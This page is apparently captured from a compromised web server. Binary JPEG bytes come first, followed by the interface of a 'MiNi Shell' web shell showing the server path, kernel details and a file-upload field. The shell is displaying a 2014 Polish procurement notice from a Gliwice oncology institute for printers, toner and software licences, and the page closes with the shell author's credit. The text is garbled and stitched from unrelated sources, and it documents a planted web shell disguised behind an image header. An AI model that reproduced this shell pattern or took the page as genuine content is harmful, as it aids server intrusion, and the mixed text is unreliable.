JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140908/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140908/297978-N-2014.html

<p class="kh_header"><b>Gliwice: Dostawa urządzeń drukujących, materiałów eksploatacyjnych i podzespołów komputerowych</b><br>
<b>Numer ogłoszenia: 297978 - 2014; data zamieszczenia: 08.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Onkologii-Instytut im. Marii Skłodowskiej-Curie Oddział w Gliwicach , ul. Wybrzeże Armii Krajowej 15, 44-101 Gliwice, woj. śląskie, tel. 032 2789171, 2789172, 2789193,, faks 032 2789197, 2789198.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.io.gliwice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytut Badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa urządzeń drukujących, materiałów eksploatacyjnych i podzespołów komputerowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa urządzeń drukujących, materiałów eksploatacyjnych i podzespołów komputerowych; 
2. Przedmiot zamówienia podzielono na pięć zadań w tym:
Zad. 1 - materiały eksploatacyjne do drukarek HP i innych
Zad. 2 - podzespoły komputerowe i oprogramowanie, nośniki optyczne
Zad. 3 - urządzenia drukujące
Zad. 4 - licencje Photoshop
Zad. 5 - stacje iMac
Postepowanie o wartości poniżej 207 tyś euro.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.12.40.00-1, 30.20.00.00-1, 42.96.20.00-7, 48.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Warunkiem udziału w postępowaniu o udzielenie zamówienia publicznego jest wniesienie wadium wyłącznie dla zadanie 1 w wysokości  5.000,00 PLN (słownie: pięć tysięcy zł).
2. Wadium może być wnoszone w jednej lub kilku następujących formach: 
-  pieniądzu,
-  poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
-  gwarancjach bankowych, 
-  gwarancjach ubezpieczeniowych, 
-  poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 Ustawy  z dnia  9.XI.2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 2007 nr 42 poz. 275) 
3.   Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert .
4.   Wadium wnoszone w pieniądzu należy wpłacić na konto: ING BANK Śląski O/Gliwice nr konta: 96 1050 1285 1000 0002 0211 3460 
5.  W przypadku wnoszenia wadium w pieniądzu prosimy o załączenie do oferty potwierdzenie polecenia przelewu. 
6.  Jeżeli Wykonawca wnosi wadium w innej formie niż pieniężna odpowiedni dokument oryginał należy złożyć w osobnej kopercie do Działu Finansowo-Księgowego za pośrednictwem Kancelarii, natomiast kserokopię tego dokumentu zaleca się wpiąć do oferty. Z treści dokumentu winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Poręczyciela/Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 ustawy pzp oraz w okolicznościach określonych w art. 46 ust. 4a ustawy pzp.   
7. Przy wnoszeniu wadium, Wykonawca jest obowiązany wskazać, jakiego postępowania dotyczy wnoszone wadium. 
8. Wykonawca, którego oferta nie zostanie zabezpieczona wadium w wymaganej formie i wysokości zostanie wykluczony z postępowania na podstawie zapisów art. 24 ust. 2 pkt. 2 ustawy pzp.   
9. Oferta musi być zabezpieczona wadium od dnia otwarcia ofert przez okres 30 dni. W przypadku przesunięcia terminu składania ofert należy uwzględnić nowy termin ważności wadium. W przypadku przedłużenia terminu związania ofertą, należy przedłużyć okres ważności wadium albo, jeżeli nie jest to możliwe, należy wnieść nowe wadium na przedłużony okres związania ofertą, nie dłuższy jednak niż 60 dni. Jeżeli przedłużenie terminu związania ofertą dokonywane jest po wyborze oferty najkorzystniejszej, obowiązek wniesienia nowego wadium lub jego przedłużenia dotyczy jedynie Wykonawcy, którego oferta została wybrana jako najkorzystniejsza. 
10. Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy pzp. Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.  
11. Wykonawca, którego oferta została wybrana traci wadium warz z odsetkami na rzecz Zamawiającego w przypadku, gdy odmówi podpisania umowy na warunkach określonych w ofercie, nie wniesie wymaganego zabezpieczenia należytego wykonania umowy, zawarcie umowy w sprawie przedmiotowego zamówienia publicznego stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie powyższego warunku w oparciu o złożone oświadczenie o spełnieniu warunków udziału w postępowaniu stanowiące załącznik do siwz</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca w zakresie wiedzy i doświadczenia wykaże się (wyłącznie dla zad. 1) wykonaniem w okresie ostatnich 3 lat przed dniem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, co najmniej 4 dostawami materiałów eksploatacyjnych do urządzeń drukujących/kserujących o wartości każdej z tych dostaw minimum 340.000,00 PLN (słownie: trzysta czterdzieści tysięcy złotych). Dotyczy również zawartych umów na sukcesywną dostawę materiałów eksploatacyjnych, których wartość wynosi minimum 340.000,00 PLN każda.
2.1)  Wykonawca udokumentuje realizację przedmiotu zamówienia poprzez złożenie wykazu dostaw. Na potwierdzenie, że dostawy zostały wykonane należycie Wykonawca dostarczy dowody. Dowodami tymi są:
1)  poświadczenie, z tym, że w odniesieniu do nadal wykonywanych dostaw okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania wniosków ofert;
2)   oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt 1;
3) w przypadku, gdy zamawiający jest podmiotem, na rzecz którego dostawy wskazane w Wykazie dostaw zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej;
4)  w razie konieczności, szczególnie, gdy Wykaz dostaw lub dowody, o których mowa powyżej budzą wątpliwości zamawiającego lub gdy z poświadczenia albo z innego dokumentu wynika, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego dostawy były lub miały zostać wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio zamawiającemu.
2.  Zgodnie z art. 26 ust. 2b, Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. W przypadku korzystania z zasobów innych podmiotów Wykonawca zobowiązany jest udowodnić Zamawiającemu na termin składania ofert, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
3. W przypadku, gdy Wykonawca dla potwierdzenia spełniania warunków udziału w postępowaniu załączy dokumenty zawierające kwoty wyrażone w walutach innych niż złoty polski, Zamawiający przeliczy je na złoty polski. Do przeliczenia zostanie zastosowany średni kurs walut NBP obowiązujący w dniu:
1) zakończenia realizacji zamówienia potwierdzającego posiadanie stosownego doświadczenia.
2) w przypadku braku publikacji kursów walut NBP obowiązujących w dniach, o których mowa w pkt 1) powyżej, zastosowanie mają kursy ostatnio ogłoszone, przed ww. dniami zgodnie z treścią § 8 pkt 5 Uchwały Nr 51/2002 Zarządu Narodowego Banku Polskiego z dnia 23.9.2002 r. w sprawie sposobu wyliczania i ogłaszania bieżących kursów walut obcych [Dz. Urz. NBP.2002.14.39 ze zm.].</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie powyższego warunku w oparciu o złożone oświadczenie o spełnieniu warunków udziału w postępowaniu stanowiące załącznik do siwz</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie powyższego warunku w oparciu o złożone oświadczenie o spełnieniu warunków udziału w postępowaniu stanowiące załącznik do siwz</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca w zakresie sytuacji ekonomicznej i finansowej (wyłącznie dla zad. 1) wykaże się posiadaniem środków finansowych lub zdolności kredytowej w wysokości co najmniej 100.000,00 PLN (sto tysięcy złotych). 
Zamawiający zwraca uwagę, iż informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej ma na celu potwierdzenie wysokości posiadanych środków finansowych lub zdolności kredytowej wykonawcy, a więc wymaga formy oświadczenia, i w związku z tym musi być podpisana przez uprawnionego przedstawiciela banku lub spółdzielczej kasy oszczędnościowo-kredytowej. Wyciąg bankowy nie spełnia tych wymogów, gdyż jest informacją dla posiadacza rachunku bankowego. Również oświadczenie wykonawcy, iż posiada środki finansowe, nie spełnia wymaganej formy informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej
2.  Zgodnie z art. 26 ust. 2b, Wykonawca może polegać na zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. W przypadku korzystania z zasobów innych podmiotów Wykonawca zobowiązany jest udowodnić Zamawiającemu na termin składania ofert, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
3. W przypadku, gdy Wykonawca dla potwierdzenia spełniania warunków udziału w postępowaniu załączy dokumenty zawierające kwoty wyrażone w walutach innych niż złoty polski, Zamawiający przeliczy je na złoty polski. Do przeliczenia zostanie zastosowany średni kurs walut NBP obowiązujący w dniu:
1) zakończenia realizacji zamówienia potwierdzającego posiadanie stosownego doświadczenia.
2) w przypadku braku publikacji kursów walut NBP obowiązujących w dniach, o których mowa w pkt 1) powyżej, zastosowanie mają kursy ostatnio ogłoszone, przed ww. dniami zgodnie z treścią § 8 pkt 5 Uchwały Nr 51/2002 Zarządu Narodowego Banku Polskiego z dnia 23.9.2002 r. w sprawie sposobu wyliczania i ogłaszania bieżących kursów walut obcych [Dz. Urz. NBP.2002.14.39 ze zm.].</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. W celu potwierdzenia, że oferowany sprzęt odpowiada wymaganiom określonym przez Zamawiającego, do oferty należy załączyć, dla poszczególnych zadań, w tym:
Zad. 2 nośniki optyczne
Dokument od producenta nośnika (w j. polskim) potwierdzający spełnienie wymagań dla płyt CD, DVD, BD-R dotyczących posiadania powierzchni pokrytej warstwą odporną na zarysowania, tłuste zabrudzenia, kurz, wodę, wyładowania elektrostatyczne i ekspozycję na promieniowanie UV, oraz warstwę umożliwiająca przechowywanie danych do 100 lat. 
Zad. 3 urządzenia drukujące
Urządzenia mono:
a) Certyfikat zgodności elektrycznej, praca urządzenia w europejskiej sieci energetycznej
b) Deklaracja CE, ISO 9001 lub równoważny,
c) Dokument, że oferowany sprzęt pochodzi z autoryzowanego kanału sprzedaży producenta na rynek polski - potwierdzający posiadanie autoryzacji;
d) Oświadczenie, że całość dostarczanego sprzętu będzie fabrycznie nowa (wyprodukowana nie wcześniej niż 6 miesięcy przed dostawą), nie używana we wcześniejszych projektach.
e) Oświadczenia producenta, że w przypadku nie wywiązania się z obowiązków gwarancyjnych oferenta lub firmy serwisującej, przejmie na siebie wszelkie zobowiązania związane z serwisem.
f) Oświadczenie producenta dostarczonego urządzenia mówiące o tym, że koszt wydruku strony na oryginalnym tonerze o pojemności 12 000 stron na dzień składania oferty nie przekroczy wartości 0,021 PLN netto za stronę. Oświadczenie od producenta urządzenia drukującego o możliwości zastosowania w nim ww. materiału eksploatacyjnego.
g) Wieczysta gwarancja na głowicę LED lub LASER urządzenia potwierdzona przez producenta sprzętu.
Urządzenia kolor:
a) Certyfikat zgodności elektrycznej, praca urządzenia w europejskiej sieci energetycznej
b) Deklaracja CE, ISO 9001 lub równoważny, 
c) Dokument, że oferowany sprzęt pochodzi z autoryzowanego kanału sprzedaży producenta na rynek polski - potwierdzający posiadanie autoryzacji;
d) Oświadczenie, że całość dostarczanego sprzętu będzie fabrycznie nowa (wyprodukowana nie wcześniej niż 6 miesięcy przed dostawą), nieużywana we wcześniejszych projektach ,
e) Oświadczenia producenta, że w przypadku nie wywiązania się z obowiązków gwarancyjnych oferenta lub firmy serwisującej, przejmie na siebie wszelkie zobowiązania związane z serwisem.
f) Oświadczenie producenta dostarczonego urządzenia mówiące tym, że koszt wydruku strony na oryginalnym tonerze o pojemności 7000 stron czarny i 6000 stron kolor na dzień składania oferty nie przekroczy wartości 0,02 PLN netto za stronę na toner czarny oraz 0,21 PLN netto za stronę w kolorze. Oświadczenie od producenta urządzenia drukującego o możliwości zastosowania w nim ww. materiałów eksploatacyjnych.
g) Wieczysta gwarancja na głowicę LED lub LASER urządzenia potwierdzona przez producenta sprzętu.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>I. Zmiany dotyczące umowy dla dostawy sprzętu
1. Zmiana umownego terminu realizacji przedmiotu umowy może wystąpić wyjątkowo jedynie w wypadku działania siły wyższej, za którą Strony będą uważać nagłe zdarzenie, niezależne od Stron, których Strony nie mogły przewidzieć przed zawarciem umowy,  a których działanie uniemożliwia wykonanie umowy zgodnie z terminem określonym w umowie. 
2. Wynagrodzenie określone w umowie jest ostateczne. Jego wysokość brutto wyjątkowo może zostać zmieniona wyłącznie w razie ustawowej zmiany stawki podatku od towarów i usług, czego Strony nie zdołały przewidzieć w czasie zawarcia umowy.
3. Dopuszcza się możliwość zmiany jakości (na wyższą) zaoferowanego sprzętu, przy zachowaniu lub obniżeniu ceny, określonej w umowie. 
II. Zmiany do umowy na materiały eksploatacyjne 
1. Zamawiający z inicjatywy własnej lub Wykonawcy dopuszcza zmiany w umowie w następujących przypadkach:
a) zmianie jakości (na wyższą) zaoferowanych produktów, przy zachowaniu lub obniżeniu ceny,
b) zmianie numeru katalogowego/oznaczenia/kodu produktu,
c) zmianie nazewnictwa produktu, pod warunkiem, że będzie to ten sam produkt</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.io.gliwice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba Zamawiającego; Dział Zamówień Publicznych i Zaopatrzenia pok. 2.001.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.09.2014 godzina 09:30, miejsce: siedziba Zamawiającego; Dział Zamówień Publicznych i Zaopatrzenia pok. 2.001.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nr sprawy nadany przez Zamawiającego - DO/DZ-381-1-92/14
Realizację zamówienia podzielono w zależności od zadań, w tym:
zad. 1 - zamówienia będą realizowane sukcesywnie, według rzeczywistych potrzeb Zamawiającego przez 18 miesięcy licząc od dnia zawarcia umowy, przy czym dostawy cząstkowe będą realizowane w ciągu 7 dni roboczych od daty przekazania zamówienia. 
zad. 2-5 -   do 30 dni od daty zawarcia umowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com